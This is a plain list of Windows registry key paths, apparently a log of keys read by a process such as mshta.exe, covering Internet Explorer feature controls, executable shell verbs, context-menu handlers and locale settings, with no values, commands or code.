HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\BrowserEmulation
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\BrowserEmulation\CVListXMLVersionLow
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\BrowserEmulation\CVListXMLVersionHigh
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\BrowserEmulation\IECompatVersionLow
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\BrowserEmulation\IECompatVersionHigh
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_RESTRICT_FILEDOWNLOAD
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_RESTRICT_FILEDOWNLOAD
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_RESTRICT_FILEDOWNLOAD\mshta.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_RESTRICT_FILEDOWNLOAD\*
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale\Alternate Sorts
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Language Groups
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000409
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Language Groups\1
HKEY_CURRENT_USER\Software\Microsoft\Avalon.Graphics
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer\PrefetchPrerender
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\PrefetchPrerender
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\PrefetchPrerender
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\PrefetchPrerender\Enabled
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\PrefetchPrerender
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.exe\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\DocObject
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\DocObject
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.exe\Content Type
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\IsShortcut
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\IsShortcut
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\AlwaysShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\AlwaysShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\NeverShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\NeverShowExt
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{210acb58-272f-11e9-8326-806e6f6e6963}\Generation
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\System.NamespaceCLSID
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\{28636AA6-953D-11D2-B5D6-00C04FD918D0} 6
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\lnkfile\NoRecentDocs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00021401-0000-0000-C000-000000000046}\flags
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shellex\ContextMenuHandlers\Compatibility\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shellex\ContextMenuHandlers\Compatibility\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\7-Zip\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\7-Zip\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\ANotepad++\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\ANotepad++\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\BriefcaseMenu\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\BriefcaseMenu\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\Open With\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\Open With\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\Open With EncryptionMenu\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\Open With EncryptionMenu\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\Sharing\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\Sharing\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\WinRAR\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\WinRAR\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\XXX Groove GFS Context Menu Handler XXX\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\XXX Groove GFS Context Menu Handler XXX\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\{90AA3A4E-1CBA-4233-B8BB-535773D48449}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\{a2a9545d-a0c2-42b4-9708-a0b2badd77c8}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\shellex\ContextMenuHandlers\CopyAsPathMenu\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\shellex\ContextMenuHandlers\CopyAsPathMenu\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\shellex\ContextMenuHandlers\SendTo\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\shellex\ContextMenuHandlers\SendTo\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\shellex\ContextMenuHandlers\XXX Groove GFS Context Menu Handler XXX\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\shellex\ContextMenuHandlers\XXX Groove GFS Context Menu Handler XXX\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\shellex\ContextMenuHandlers\{474C98EE-CF3D-41f5-80E3-4AAB0AB04301}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\shellex\ContextMenuHandlers\{596AB062-B4D2-4215-9F74-E9109B0A8153}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C467336-8281-4E60-8204-430CED96822D}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C467336-8281-4E60-8204-430CED96822D}\InprocServer32\LoadWithoutCOM
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\NoRecentDocs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C467336-8281-4E60-8204-430CED96822D}\flags
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\PropertySystem\PropertyHandlers\.exe\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{66742402-F9B9-11D1-A202-0000F81FEDEE}\DisableProcessIsolation
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{66742402-F9B9-11D1-A202-0000F81FEDEE}\NoOplock
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{66742402-F9B9-11D1-A202-0000F81FEDEE}\UseInProcHandlerCache
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{66742402-F9B9-11D1-A202-0000F81FEDEE}\UseOutOfProcHandlerCache
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{09799AFB-AD67-11d1-ABCD-00C04FC30936}\flags
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\NoRecentDocs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{21B22460-3AEA-1069-A2DC-08002B30309D}\flags
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\NoStaticDefaultVerb
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\ExplorerCommandHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\command\DelegateExecute
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\ExplorerCommandHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\command\DelegateExecute
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runasuser\ExplorerCommandHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runasuser\command\DelegateExecute
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runasuser\LegacyDisable
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runasuser\CheckSupportedTypes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runasuser\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runasuser\SuppressionPolicyEx
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runasuser\SuppressionSlapiPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\LegacyDisable
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\CheckSupportedTypes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\SuppressionPolicyEx
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\SuppressionSlapiPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\LegacyDisable
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\CheckSupportedTypes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\SuppressionPolicyEx
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\SuppressionSlapiPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\CommandStateHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\DefaultAppliesTo
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\CommandFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\SubCommands
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\ExtendedSubCommandsKey
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\HasLUAShield
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\Extended
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\OnlyInBrowserWindow
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\ProgrammaticAccessOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\MultiSelectModel
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MultipleInvokePromptMinimum
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MultipleInvokePromptMinimum
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\MUIVerb
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\ClientOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\ImpliedSelectionModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\StaticVerbOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\IsInContextMenu
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\PaneVisibleProperty
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\AppliesTo
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\ReadWriteRequired
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\DownloadInvokeDisabled
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\MaxDownloadFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\Position
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\SeparatorBefore
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\SeparatorAfter
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\CommandStateHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\DefaultAppliesTo
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\CommandFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\SubCommands
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\ExtendedSubCommandsKey
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\HasLUAShield
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\Extended
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\OnlyInBrowserWindow
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\ProgrammaticAccessOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\MultiSelectModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\MUIVerb
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\ClientOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\ImpliedSelectionModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\StaticVerbOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\IsInContextMenu
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\PaneVisibleProperty
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\AppliesTo
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\ReadWriteRequired
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\DownloadInvokeDisabled
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\MaxDownloadFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\Position
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\SeparatorBefore
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\SeparatorAfter
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runasuser\CommandStateHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runasuser\DefaultAppliesTo
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runasuser\CommandFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runasuser\SubCommands
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runasuser\ExtendedSubCommandsKey
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runasuser\HasLUAShield
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runasuser\Extended
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\NeverDefault
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\NoRecentDocs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\NoStaticDefaultVerb
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\NoStaticDefaultVerb
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\NoRecentDocs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\NoStaticDefaultVerb
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\lnkfile\NoStaticDefaultVerb
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileAssociation\AllowedReservedCharacters
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.ade\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.adp\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.asp\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.bas\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.bat\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.cer\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.chm\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.cmd\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.com\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.cpl\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.crt\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Security\DisableSecuritySettingsCheck
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security\DisableSecuritySettingsCheck
HKEY_LOCAL_MACHINE\SYSTEM\Setup\SystemSetupInProgress
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Flags
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Flags
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Flags
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Flags
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Flags
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN\cmd.exe
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN\*
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN\cmd.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN\*
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\SpecialFoldersCacheSize
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\SpecialFoldersCacheSize
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SpecialFoldersCacheSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\SpecialFoldersCacheSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_PROTOCOL_LOCKDOWN\cmd.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_PROTOCOL_LOCKDOWN\*
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1806
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1806
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\safer\codeidentifiers\TransparentEnabled
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\command\command
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\command\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\SetWorkingDirectoryFromTarget
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\NoWorkingDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\LogIgnoreMonitorReason
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\DisableUserModeCallbackFilter
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\DEPOff
\x1a60\x19fEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Sorting\Versions\00060101.00060101
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\RtfConverterFlags
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Use_DlgBox_Colors
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Anchor Underline
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\CSS_Compat
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Expand Alt Text
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Display Inline Images
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Display Inline Videos
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\Display Inline Videos
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Play_Background_Sounds
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Play_Animations
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Print_Background
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\Print_Background
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\SmoothScroll
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\SmoothScroll
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\XMLHTTP
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Show image placeholders
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\Show image placeholders
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Disable Script Debugger
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\DisableScriptDebuggerIE
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Disable Diagnostics Mode
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\Disable Diagnostics Mode
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Move System Caret
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Enable AutoImageResize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\Enable AutoImageResize
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\UseHR
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Q300829
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Cleanup HTCs
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\XDomainRequest
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\XDomainRequest
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\DOMStorage
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\DOMStorage
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\JScriptProfileCacheEventDelay
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Default_CodePage
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\AutoDetect
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\Default_IEFontSizePrivate
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings\Anchor Color
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings\Anchor Color Visited
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings\Anchor Color Hover
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings\Always Use My Colors
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings\Always Use My Font Size
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings\Always Use My Font Face
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings\Disable Visited Hyperlinks
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings\Use Anchor Hover Color
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings\MiscFlags
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Allow Programmatic Cut_Copy_Paste
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\DisableCachingOfSSLPages
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\DisableCachingOfSSLPages
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableCachingOfSSLPages
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\PageSetup\Print_Background
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Flags
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Flags
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\950
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\3\IEFontSize
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\3\IEFontSizePrivate
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\3\IEPropFontName
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\3\IEFixedFontName
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\3\IESerifFontName
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\3\IESansSerifFontName
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\3\IEUIFontName
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\AcceptLanguage
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Version Vector\IE
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Version Vector\VML
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Version Vector\WindowsEdition
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_ZONE_ELEVATION\mshta.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_ZONE_ELEVATION\*
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\text/xml\CLSID
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SyncMode5
